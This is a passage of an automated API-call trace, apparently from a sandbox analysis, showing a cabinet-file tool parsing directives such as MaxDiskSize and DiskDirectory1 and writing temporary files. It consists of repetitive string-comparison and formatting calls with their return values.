_Str2="Infdisk#") returned -6 [0254.816] _strcmpi (_Str1="ClusterSize", _Str2="Infdisk#") returned -6 [0254.816] _strcmpi (_Str1="Compress", _Str2="Infdisk#") returned -6 [0254.816] _strcmpi (_Str1="LongSourceFileNames", _Str2="Infdisk#") returned 3 [0254.816] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="Infdisk#") returned -6 [0254.816] _strcmpi (_Str1="CompressionType", _Str2="Infdisk#") returned -6 [0254.816] _strcmpi (_Str1="CompressionLevel", _Str2="Infdisk#") returned -6 [0254.816] _strcmpi (_Str1="CompressionMemory", _Str2="Infdisk#") returned -6 [0254.816] _strcmpi (_Str1="DestinationDir", _Str2="Infdisk#") returned -5 [0254.816] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="Infdisk#") returned -5 [0254.816] _strcmpi (_Str1="DiskLabelTemplate", _Str2="Infdisk#") returned -5 [0254.816] _strcmpi (_Str1="DoNotCopyFiles", _Str2="Infdisk#") returned -5 [0254.816] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="Infdisk#") returned -3 [0254.816] _strcmpi (_Str1="FolderSizeThreshold", _Str2="Infdisk#") returned -3 [0254.816] _strcmpi (_Str1="GenerateInf", _Str2="Infdisk#") returned -2 [0254.816] _strcmpi (_Str1="InfCabinetHeader", _Str2="Infdisk#") returned -1 [0254.816] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="Infdisk#") returned -1 [0254.816] _strcmpi (_Str1="InfCommentString", _Str2="Infdisk#") returned -1 [0254.816] _strcmpi (_Str1="InfDateFormat", _Str2="Infdisk#") returned -8 [0254.816] _strcmpi (_Str1="InfDiskHeader", _Str2="Infdisk#") returned 69 [0254.816] _strcmpi (_Str1="InfDiskLineFormat", _Str2="Infdisk#") returned 73 [0254.816] _strcmpi (_Str1="InfFileHeader", _Str2="Infdisk#") returned 2 [0254.816] _strcmpi (_Str1="InfFileLineFormat", _Str2="Infdisk#") returned 2 [0254.816] _strcmpi (_Str1="InfFileName", _Str2="Infdisk#") returned 2 [0254.816] _strcmpi (_Str1="InfFooter", _Str2="Infdisk#") returned 2 [0254.816] _strcmpi (_Str1="InfFooter1", _Str2="Infdisk#") returned 2 [0254.816] _strcmpi (_Str1="InfFooter2", _Str2="Infdisk#") returned 2 [0254.816] _strcmpi (_Str1="InfFooter3", _Str2="Infdisk#") returned 2 [0254.816] _strcmpi (_Str1="InfFooter4", _Str2="Infdisk#") returned 2 [0254.816] _strcmpi (_Str1="InfHeader", _Str2="Infdisk#") returned 4 [0254.816] _strcmpi (_Str1="InfHeader1", _Str2="Infdisk#") returned 4 [0254.816] _strcmpi (_Str1="InfHeader2", _Str2="Infdisk#") returned 4 [0254.816] _strcmpi (_Str1="InfHeader3", _Str2="Infdisk#") returned 4 [0254.816] _strcmpi (_Str1="InfHeader4", _Str2="Infdisk#") returned 4 [0254.816] _strcmpi (_Str1="InfHeader5", _Str2="Infdisk#") returned 4 [0254.816] _strcmpi (_Str1="InfHeader6", _Str2="Infdisk#") returned 4 [0254.816] _strcmpi (_Str1="InfSectionOrder", _Str2="Infdisk#") returned 15 [0254.816] _strcmpi (_Str1="MaxCabinetSize", _Str2="Infdisk#") returned 4 [0254.816] _strcmpi (_Str1="MaxDiskFileCount", _Str2="Infdisk#") returned 4 [0254.816] _strcmpi (_Str1="MaxDiskSize", _Str2="Infdisk#") returned 4 [0254.816] _strcmpi (_Str1="MaxErrors", _Str2="Infdisk#") returned 4 [0254.816] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="Infdisk#") returned 9 [0254.816] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="Infdisk#") returned 9 [0254.816] _strcmpi (_Str1="ReservePerFolderSize", _Str2="Infdisk#") returned 9 [0254.816] _strcmpi (_Str1="RptFileName", _Str2="Infdisk#") returned 9 [0254.817] _strcmpi (_Str1="SourceDir", _Str2="Infdisk#") returned 10 [0254.817] atoi (_Str="1") returned 1 [0254.817] _vsnprintf (in: _DstBuf=0x27e87fdda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fdd08 | out: _DstBuf="Infdisk#") returned 8 [0254.817] atoi (_Str="1") returned 1 [0254.817] _vsnprintf (in: _DstBuf=0x27e8c1af6a, _MaxCount=0x1fd, _Format="%d", _ArgList=0x27e87fe328 | out: _DstBuf="1") returned 1 [0254.817] atoi (_Str="1") returned 1 [0254.817] _vsnprintf (in: _DstBuf=0x27e87fdda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fdd08 | out: _DstBuf="Infcabfile") returned 10 [0254.817] atoi (_Str="1") returned 1 [0254.817] atoi (_Str="1") returned 1 [0254.817] _vsnprintf (in: _DstBuf=0x27e87fdda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fdd08 | out: _DstBuf="Infdisk#") returned 8 [0254.817] atoi (_Str="1") returned 1 [0254.817] _vsnprintf (in: _DstBuf=0x27e8c1af68, _MaxCount=0x1ff, _Format="%d", _ArgList=0x27e87fe328 | out: _DstBuf="1") returned 1 [0254.817] atoi (_Str="1") returned 1 [0254.817] _vsnprintf (in: _DstBuf=0x27e87fdda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fdd08 | out: _DstBuf="Infcab#") returned 7 [0254.817] atoi (_Str="1") returned 1 [0254.817] _vsnprintf (in: _DstBuf=0x27e8c1af6a, _MaxCount=0x1fd, _Format="%d", _ArgList=0x27e87fe328 | out: _DstBuf="1") returned 1 [0254.817] atoi (_Str="1") returned 1 [0254.818] _vsnprintf (in: _DstBuf=0x27e87fdda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fdd08 | out: _DstBuf="Inffile") returned 7 [0254.818] atoi (_Str="1") returned 1 [0254.818] atoi (_Str="1") returned 1 [0254.818] _vsnprintf (in: _DstBuf=0x27e87fdda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fdd08 | out: _DstBuf="Infsize") returned 7 [0254.818] atoi (_Str="1") returned 1 [0254.818] _vsnprintf (in: _DstBuf=0x27e8c1af73, _MaxCount=0x1f4, _Format="%ld", _ArgList=0x27e87fe328 | out: _DstBuf="1") returned 1 [0254.818] _vsnprintf (in: _DstBuf=0x27e87fe5a3, _MaxCount=0xa, _Format="_%u_", _ArgList=0x27e87fe598 | out: _DstBuf="_512_") returned 5 [0254.818] _tempnam (_Directory="", _FilePrefix="inf_512_") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\inf_512_2" [0254.818] fopen (_Filename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\inf_512_2" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\inf_512_2"), _Mode="wt") returned 0x7ff97744e2a0 [0254.819] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\n" | out: _File=0x7ff97744e2a0) returned 12 [0254.819] _vsnprintf (in: _DstBuf=0x27e87ff270, _MaxCount=0x1f, _Format="InfDiskHeader%d", _ArgList=0x27e87fe478 | out: _DstBuf="InfDiskHeader1") returned 14 [0254.819] atoi (_Str="1") returned 1 [0254.819] _vsnprintf (in: _DstBuf=0x27e87fe2d0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fe238 | out: _DstBuf="InfDiskHeader1") returned 14 [0254.819] atoi (_Str="1") returned 1 [0254.819] _vsnprintf (in: _DstBuf=0x27e87fe5a3, _MaxCount=0xa, _Format="_%u_", _ArgList=0x27e87fe598 | out: _DstBuf="_512_") returned 5 [0254.819] _tempnam (_Directory="", _FilePrefix="inf_512_") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\inf_512_3" [0254.820] fopen (_Filename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\inf_512_3" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\inf_512_3"), _Mode="wt") returned 0x7ff97744e2d0 [0254.820] fprintf (in: _File=0x7ff97744e2d0, _Format="%s\n" | out: _File=0x7ff97744e2d0) returned 15 [0254.820] _vsnprintf (in: _DstBuf=0x27e87ff270, _MaxCount=0x1f, _Format="InfCabinetHeader%d", _ArgList=0x27e87fe478 | out: _DstBuf="InfCabinetHeader1") returned 17 [0254.821] atoi (_Str="1") returned 1 [0254.821] _vsnprintf (in: _DstBuf=0x27e87fe2d0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fe238 | out: _DstBuf="InfCabinetHeader1") returned 17 [0254.821] atoi (_Str="1") returned 1 [0254.821] _vsnprintf (in: _DstBuf=0x27e87fe5a3, _MaxCount=0xa, _Format="_%u_", _ArgList=0x27e87fe598 | out: _DstBuf="_512_") returned 5 [0254.821] _tempnam (_Directory="", _FilePrefix="inf_512_") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\inf_512_4" [0254.821] fopen (_Filename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\inf_512_4" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\inf_512_4"), _Mode="wt") returned 0x7ff97744e300 [0254.821] fprintf (in: _File=0x7ff97744e300, _Format="%s\n" | out: _File=0x7ff97744e300) returned 12 [0254.822] _vsnprintf (in: _DstBuf=0x27e87ff270, _MaxCount=0x1f, _Format="InfFileHeader%d", _ArgList=0x27e87fe478 | out: _DstBuf="InfFileHeader1") returned 14 [0254.822] atoi (_Str="1") returned 1 [0254.822] _vsnprintf (in: _DstBuf=0x27e87fe2d0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fe238 | out: _DstBuf="InfFileHeader1") returned 14 [0254.822] atoi (_Str="1") returned 1 [0254.822] atoi (_Str="1 bytes in %2 files") returned 1 [0254.822] atoi (_Str="2 files") returned 2 [0254.822] _vsnprintf (in: _DstBuf=0x27e87ff040, _MaxCount=0x1ff, _Format="%ld", _ArgList=0x27e87fefa8 | out: _DstBuf="96") returned 2 [0254.822] strspn (_Str="96", _Control=" ") returned 0x0 [0254.822] strpbrk (_Str="96", _Control=" ") returned 0x0 [0254.822] _vsnprintf (in: _DstBuf=0x27e87ff044, _MaxCount=0x1fb, _Format="%ld", _ArgList=0x27e87fefa8 | out: _DstBuf="1") returned 1 [0254.822] strspn (_Str="1", _Control=" ") returned 0x0 [0254.822] strpbrk (_Str="1", _Control=" ") returned 0x0 [0254.822] atoi (_Str="1 bytes in %2 files") returned 1 [0254.822] atoi (_Str="2 files") returned 2 [0254.823] printf (_Format="%s%s\n") returned 76 [0254.932] printf (_Format="%s%s\r") returned 21 [0255.599] _open (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\1a70.bin"), _OpenFlag=32768) returned 6 [0255.600] _read (in: _FileHandle=6, _DstBuf=0x27e87ff2f0, _MaxCharCount=0x3 | out: _DstBuf=0x27e87ff2f0*) returned 3 [0255.600] _lseek (_FileHandle=6, _Offset=0, _Origin=0) returned 0 [0255.600] _read (in: _FileHandle=6, _DstBuf=0x27e8aa1090, _MaxCharCount=0x1000 | out: _DstBuf=0x27e8aa1090*) returned 156 [0255.600] strpbrk (_Str=".set MaxDiskSize=0", _Control=" \x09") returned=" MaxDiskSize=0" [0255.600] strspn (_Str=" MaxDiskSize=0", _Control=" \x09") returned 0x1 [0255.600] strpbrk (_Str="MaxDiskSize=0", _Control=" \x09") returned 0x0 [0255.600] strspn (_Str=".set MaxDiskSize=0", _Control=" \x09") returned 0x0 [0255.600] strspn (_Str=".set MaxDiskSize=0", _Control=" \x09") returned 0x0 [0255.600] strpbrk (_Str="set MaxDiskSize=0", _Control=" \x09") returned=" MaxDiskSize=0" [0255.601] _strcmpi (_Str1="Define", _Str2="set") returned -15 [0255.601] _strcmpi (_Str1="Delete", _Str2="set") returned -15 [0255.601] _strcmpi (_Str1="Dump", _Str2="set") returned -15 [0255.601] _strcmpi (_Str1="InfBegin", _Str2="set") returned -10 [0255.601] _strcmpi (_Str1="InfEnd", _Str2="set") returned -10 [0255.601] _strcmpi (_Str1="InfWrite", _Str2="set") returned -10 [0255.601] _strcmpi (_Str1="InfWriteCabinet", _Str2="set") returned -10 [0255.601] _strcmpi (_Str1="InfWriteDisk", _Str2="set") returned -10 [0255.601] _strcmpi (_Str1="New", _Str2="set") returned -5 [0255.601] _strcmpi (_Str1="Option", _Str2="set") returned -4 [0255.601] _strcmpi (_Str1="Set", _Str2="set") returned 0 [0255.601] strspn (_Str=" MaxDiskSize=0", _Control=" \x09") returned 0x1 [0255.601] strpbrk (_Str="MaxDiskSize=0", _Control="= \x09") returned="=0" [0255.601] strspn (_Str="=0", _Control=" \x09") returned 0x0 [0255.601] strspn (_Str="0", _Control=" \x09") returned 0x0 [0255.601] strpbrk (_Str="0", _Control=" \x09") returned 0x0 [0255.601] strspn (_Str="", _Control=" \x09") returned 0x0 [0255.601] _strcmpi (_Str1="0", _Str2="360K") returned -3 [0255.601] atol (_Str="362496") returned 362496 [0255.601] atol (_Str="0") returned 0 [0255.601] _strcmpi (_Str1="0", _Str2="720K") returned -7 [0255.601] atol (_Str="730112") returned 730112 [0255.601] atol (_Str="0") returned 0 [0255.601] _strcmpi (_Str1="0", _Str2="1.2M") returned -1 [0255.601] atol (_Str="1213952") returned 1213952 [0255.601] atol (_Str="0") returned 0 [0255.601] _strcmpi (_Str1="0", _Str2="1.25M") returned -1 [0255.601] atol (_Str="1250304") returned 1250304 [0255.601] atol (_Str="0") returned 0 [0255.601] _strcmpi (_Str1="0", _Str2="1.44M") returned -1 [0255.601] atol (_Str="1457664") returned 1457664 [0255.601] atol (_Str="0") returned 0 [0255.601] _strcmpi (_Str1="0", _Str2="1.68M") returned -1 [0255.601] atol (_Str="1716224") returned 1716224 [0255.601] atol (_Str="0") returned 0 [0255.601] _strcmpi (_Str1="0", _Str2="DMF168") returned -52 [0255.601] atol (_Str="1716224") returned 1716224 [0255.601] atol (_Str="0") returned 0 [0255.601] _strcmpi (_Str1="0", _Str2="CDROM") returned -51 [0255.602] atol (_Str="681984000") returned 681984000 [0255.602] atol (_Str="0") returned 0 [0255.602] _strcmpi (_Str1="Cabinet", _Str2="MaxDiskSize") returned -10 [0255.602] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="MaxDiskSize") returned -10 [0255.602] _strcmpi (_Str1="CabinetNameTemplate", _Str2="MaxDiskSize") returned -10 [0255.602] _strcmpi (_Str1="ChecksumWidth", _Str2="MaxDiskSize") returned -10 [0255.602] _strcmpi (_Str1="ClusterSize", _Str2="MaxDiskSize") returned -10 [0255.602] _strcmpi (_Str1="Compress", _Str2="MaxDiskSize") returned -10 [0255.602] _strcmpi (_Str1="LongSourceFileNames", _Str2="MaxDiskSize") returned -1 [0255.602] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="MaxDiskSize") returned -10 [0255.602] _strcmpi (_Str1="CompressionType", _Str2="MaxDiskSize") returned -10 [0255.602] _strcmpi (_Str1="CompressionLevel", _Str2="MaxDiskSize") returned -10 [0255.602] _strcmpi (_Str1="CompressionMemory", _Str2="MaxDiskSize") returned -10 [0255.602] _strcmpi (_Str1="DestinationDir", _Str2="MaxDiskSize") returned -9 [0255.602] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="MaxDiskSize") returned -9 [0255.602] _strcmpi (_Str1="DiskLabelTemplate", _Str2="MaxDiskSize") returned -9 [0255.602] _strcmpi (_Str1="DoNotCopyFiles", _Str2="MaxDiskSize") returned -9 [0255.602] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="MaxDiskSize") returned -7 [0255.602] _strcmpi (_Str1="FolderSizeThreshold", _Str2="MaxDiskSize") returned -7 [0255.602] _strcmpi (_Str1="GenerateInf", _Str2="MaxDiskSize") returned -6 [0255.602] _strcmpi (_Str1="InfCabinetHeader", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfCommentString", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfDateFormat", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfDiskHeader", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfDiskLineFormat", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfFileHeader", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfFileLineFormat", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfFileName", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfFooter", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfFooter1", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfFooter2", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfFooter3", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfFooter4", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfHeader", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfHeader1", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfHeader2", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfHeader3", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfHeader4", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfHeader5", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfHeader6", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="InfSectionOrder", _Str2="MaxDiskSize") returned -4 [0255.602] _strcmpi (_Str1="MaxCabinetSize", _Str2="MaxDiskSize") returned -1 [0255.602] _strcmpi (_Str1="MaxDiskFileCount", _Str2="MaxDiskSize") returned -13 [0255.603] _strcmpi (_Str1="MaxDiskSize", _Str2="MaxDiskSize") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="360K") returned -3 [0255.603] atol (_Str="362496") returned 362496 [0255.603] atol (_Str="0") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="720K") returned -7 [0255.603] atol (_Str="730112") returned 730112 [0255.603] atol (_Str="0") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="1.2M") returned -1 [0255.603] atol (_Str="1213952") returned 1213952 [0255.603] atol (_Str="0") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="1.25M") returned -1 [0255.603] atol (_Str="1250304") returned 1250304 [0255.603] atol (_Str="0") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="1.44M") returned -1 [0255.603] atol (_Str="1457664") returned 1457664 [0255.603] atol (_Str="0") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="1.68M") returned -1 [0255.603] atol (_Str="1716224") returned 1716224 [0255.603] atol (_Str="0") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="DMF168") returned -52 [0255.603] atol (_Str="1716224") returned 1716224 [0255.603] atol (_Str="0") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="CDROM") returned -51 [0255.603] atol (_Str="681984000") returned 681984000 [0255.603] atol (_Str="0") returned 0 [0255.603] _strcmpi (_Str1="MaxDiskSize", _Str2="MaxDiskSize") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="360K") returned -3 [0255.603] atol (_Str="362496") returned 362496 [0255.603] atol (_Str="0") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="720K") returned -7 [0255.603] atol (_Str="730112") returned 730112 [0255.603] atol (_Str="0") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="1.2M") returned -1 [0255.603] atol (_Str="1213952") returned 1213952 [0255.603] atol (_Str="0") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="1.25M") returned -1 [0255.603] atol (_Str="1250304") returned 1250304 [0255.603] atol (_Str="0") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="1.44M") returned -1 [0255.603] atol (_Str="1457664") returned 1457664 [0255.603] atol (_Str="0") returned 0 [0255.603] _strcmpi (_Str1="0", _Str2="1.68M") returned -1 [0255.604] atol (_Str="1716224") returned 1716224 [0255.604] atol (_Str="0") returned 0 [0255.604] _strcmpi (_Str1="0", _Str2="DMF168") returned -52 [0255.604] atol (_Str="1716224") returned 1716224 [0255.604] atol (_Str="0") returned 0 [0255.604] _strcmpi (_Str1="0", _Str2="CDROM") returned -51 [0255.604] atol (_Str="681984000") returned 681984000 [0255.604] atol (_Str="0") returned 0 [0255.604] strpbrk (_Str=".set DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned=" DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"" [0255.604] strspn (_Str=" DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x1 [0255.604] strpbrk (_Str="DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x0 [0255.604] strspn (_Str=".set DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x0 [0255.604] strspn (_Str=".set DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x0 [0255.604] strpbrk (_Str="set DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned=" DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"" [0255.604] _strcmpi (_Str1="Define", _Str2="set") returned -15 [0255.604] _strcmpi (_Str1="Delete", _Str2="set") returned -15 [0255.604] _strcmpi (_Str1="Dump", _Str2="set") returned -15 [0255.604] _strcmpi (_Str1="InfBegin", _Str2="set") returned -10 [0255.604] _strcmpi (_Str1="InfEnd", _Str2="set") returned -10 [0255.604] _strcmpi (_Str1="InfWrite", _Str2="set") returned -10 [0255.604] _strcmpi (_Str1="InfWriteCabinet", _Str2="set") returned -10 [0255.604] _strcmpi (_Str1="InfWriteDisk", _Str2="set") returned -10 [0255.604] _strcmpi (_Str1="New", _Str2="set") returned -5 [0255.604] _strcmpi (_Str1="Option", _Str2="set") returned -4 [0255.604] _strcmpi (_Str1="Set", _Str2="set") returned 0 [0255.604] strspn (_Str=" DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x1 [0255.604] strpbrk (_Str="DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control="= \x09") returned="=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"" [0255.604] strspn (_Str="=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x0 [0255.604] strspn (_Str="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"", _Control=" \x09") returned 0x0 [0255.604] strspn (_Str="", _Control=" \x09") returned 0x0 [0255.604] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="360K") returned 48 [0255.604] atol (_Str="362496") returned 362496 [0255.604] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0255.604] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="720K") returned 44 [0255.604] atol (_Str="730112") returned 730112 [0255.604] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0255.604] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="1.2M") returned 50 [0255.604] atol (_Str="1213952") returned 1213952 [0255.604] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0255.604] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="1.25M") returned 50 [0255.604] atol (_Str="1250304") returned 1250304 [0255.604] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0255.604] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="1.44M") returned 50 [0255.605] atol (_Str="1457664") returned 1457664 [0255.605] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0255.605] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="1.68M") returned 50 [0255.605] atol (_Str="1716224") returned 1716224 [0255.605] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0255.605] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="DMF168") returned -1 [0255.605] atol (_Str="1716224") returned 1716224 [0255.605] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0255.605] _strcmpi (_Str1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", _Str2="CDROM") returned -42 [0255.605] atol (_Str="681984000") returned 681984000 [0255.605] atol (_Str="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0 [0255.605] _strcmpi (_Str1="Cabinet", _Str2="DiskDirectory1") returned -1 [0255.605] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DiskDirectory1") returned -1 [0255.605] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DiskDirectory1") returned -1 [0255.605] _strcmpi (_Str1="ChecksumWidth", _Str2="DiskDirectory1") returned -1 [0255.605] _strcmpi (_Str1="ClusterSize", _Str2="DiskDirectory1") returned -1 [0255.605] _strcmpi (_Str1="Compress", _Str2="DiskDirectory1") returned -1 [0255.605] _strcmpi (_Str1="LongSourceFileNames", _Str2="DiskDirectory1") returned 8 [0255.605] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DiskDirectory1") returned -1 [0255.605] _strcmpi (_Str1="CompressionType", _Str2="DiskDirectory1") returned -1 [0255.605] _strcmpi (_Str1="CompressionLevel", _Str2="DiskDirectory1") returned -1 [0255.605] _strcmpi (_Str1="CompressionMemory", _Str2="DiskDirectory1") returned -1 [0255.605] _strcmpi (_Str1="DestinationDir", _Str2="DiskDirectory1") returned -4 [0255.605] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="DiskDirectory1") returned 67 [0255.605] _strcmpi (_Str1="DiskLabelTemplate", _Str2="DiskDirectory1") returned 8 [0255.605] _strcmpi (_Str1="DoNotCopyFiles", _Str2="DiskDirectory1") returned 6 [0255.605] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="DiskDirectory1") returned 2 [0255.605] _strcmpi (_Str1="FolderSizeThreshold", _Str2="DiskDirectory1") returned 2 [0255.605] _strcmpi (_Str1="GenerateInf", _Str2="DiskDirectory1") returned 3 [0255.605] _strcmpi (_Str1="InfCabinetHeader", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfCommentString", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfDateFormat", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfDiskHeader", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfDiskLineFormat", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfFileHeader", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfFileLineFormat", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfFileName", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfFooter", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfFooter1", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfFooter2", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfFooter3", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfFooter4", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfHeader", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfHeader1", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfHeader2", _Str2="DiskDirectory1") returned 5 [0255.605] _strcmpi (_Str1="InfHeader3", _Str2="DiskDirectory1") returned 5 [0255.606] _strcmpi (_Str1="InfHeader4", _Str2="DiskDirectory1") returned 5 [0255.606] _strcmpi (_Str1="InfHeader5", _Str2="DiskDirectory1") returned 5 [0255.606] _strcmpi (_Str1="InfHeader6", _Str2="DiskDirectory1") returned 5 [0255.606] _strcmpi (_Str1="InfSectionOrder", _Str2="DiskDirectory1") returned 5 [0255.606] _strcmpi (_Str1="MaxCabinetSize", _Str2="DiskDirectory1") returned 9 [0255.606] _strcmpi (_Str1="MaxDiskFileCount", _Str2="DiskDirectory1") returned 9 [0255.606] _strcmpi (_Str1="MaxDiskSize", _Str2="DiskDirectory1") returned 9 [0255.606] _strcmpi (_Str1="MaxErrors", _Str2="DiskDirectory1") returned 9 [0255.606] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="DiskDirectory1") returned 14 [0255.606] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="DiskDirectory1") returned 14 [0255.606] _strcmpi (_Str1="ReservePerFolderSize", _Str2="DiskDirectory1") returned 14 [0255.606] _strcmpi (_Str1="RptFileName", _Str2="DiskDirectory1") returned 14 [0255.606] _strcmpi (_Str1="SourceDir", _Str2="DiskDirectory1") returned 15 [0255.606] _strcmpi (_Str1="UniqueFiles", _Str2="DiskDirectory1") returned 17 [0255.606] atoi 